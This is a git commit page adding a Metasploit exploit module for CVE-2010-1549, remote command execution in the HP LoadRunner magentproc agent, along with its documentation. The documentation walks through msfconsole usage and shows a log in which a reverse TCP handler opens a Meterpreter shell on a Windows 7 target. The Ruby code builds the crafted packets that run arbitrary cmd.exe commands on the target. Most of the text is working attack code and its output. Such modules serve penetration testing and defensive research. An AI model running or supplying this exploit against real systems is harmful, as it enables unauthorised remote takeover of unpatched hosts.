land #9191 an exploit against HP LoadRunner magentproc
This commit is contained in:
commit
3516305517
|
@ -0,0 +1,63 @@
|
|||
HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
|
||||
|
||||
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
|
||||
HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
|
||||
The service is vulnerable provided the Secure Channel feature is disabled (default).
|
||||
|
||||
During testing, additional versions were verified to be vulnerable. The following list documents them:
|
||||
|
||||
- HP LoadRunner 12.53 Community Edition (non-default SSL turned off)
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
HP LoadRunner 9.50 or below, or a version documented above.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
|
||||
4. Do: ```set RHOST [ip]```
|
||||
5. Do: ```run```
|
||||
6. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Win7 OS with HP LoadRunner 12.53 Community Edition
|
||||
|
||||
```
|
||||
msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
|
||||
msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
|
||||
RHOST => victim
|
||||
msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||
[*] victim:54345 - Sending payload...
|
||||
[*] victim:54345 - Command Stager progress - 1.47% done (1499/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 2.93% done (2998/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes)
|
||||
...snip...
|
||||
[*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 96.72% done (98934/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 98.15% done (100400/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 99.55% done (101827/102292 bytes)
|
||||
[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
|
||||
[*] Sending stage (179267 bytes) to 2.2.2.2
|
||||
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : TARGET
|
||||
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||
Architecture : x64
|
||||
System Language : en_AU
|
||||
Domain : DOMAIN
|
||||
Logged On Users : 3
|
||||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
Background session 1? [y/N]
|
||||
|
||||
```
|
|
@ -0,0 +1,99 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
|
||||
and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
|
||||
also most likely vulneable if the (non-default) SSL option is turned off.
|
||||
By sending a specially crafted packet, an attacker can execute commands remotely.
|
||||
The service is vulnerable provided the Secure Channel feature is disabled (default).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # Original discovery # From Tenable Network Security
|
||||
'aushack' # metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2010-1549'],
|
||||
['ZDI', '10-080'],
|
||||
['BID', '39965'],
|
||||
['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
|
||||
],
|
||||
'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Note: software reportedly supports Linux - may also be vulnerable.
|
||||
['Windows (Dropper)',
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DisclosureDate' => 'May 06 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([Opt::RPORT(54345)])
|
||||
end
|
||||
|
||||
def autofilter
|
||||
true
|
||||
end
|
||||
|
||||
def execute_command(cmd, _opts = {})
|
||||
guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
|
||||
randstr = Rex::Text.rand_text_alpha(16)
|
||||
server_name = Rex::Text.rand_text_alpha(7)
|
||||
server_ip = datastore['LHOST']
|
||||
server_port = Rex::Text.rand_text_numeric(4)
|
||||
# If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
|
||||
cmd1 = "C:\\Windows\\system32\\cmd.exe"
|
||||
cmd2 = "/C \"#{cmd}\""
|
||||
|
||||
pkt1 = [0x19].pack('N') + guid + '0'
|
||||
|
||||
pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
|
||||
pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
|
||||
pkt2 << [0x7530].pack('N')
|
||||
|
||||
pkt3 = [4 + pkt2.length].pack('N') + pkt2
|
||||
|
||||
pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3
|
||||
|
||||
pkt5 = [pkt4.length].pack('N') + pkt4
|
||||
|
||||
pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
|
||||
pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')
|
||||
|
||||
pkt7 = [4 + pkt6.length].pack('N') + pkt6
|
||||
|
||||
pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7
|
||||
|
||||
pkt9 = [pkt8.length].pack('N') + pkt8
|
||||
|
||||
sploit = pkt1 + pkt5 + pkt9
|
||||
|
||||
connect
|
||||
sock.put(sploit)
|
||||
disconnect
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status('Sending payload...')
|
||||
execute_cmdstager(linemax: 1500)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue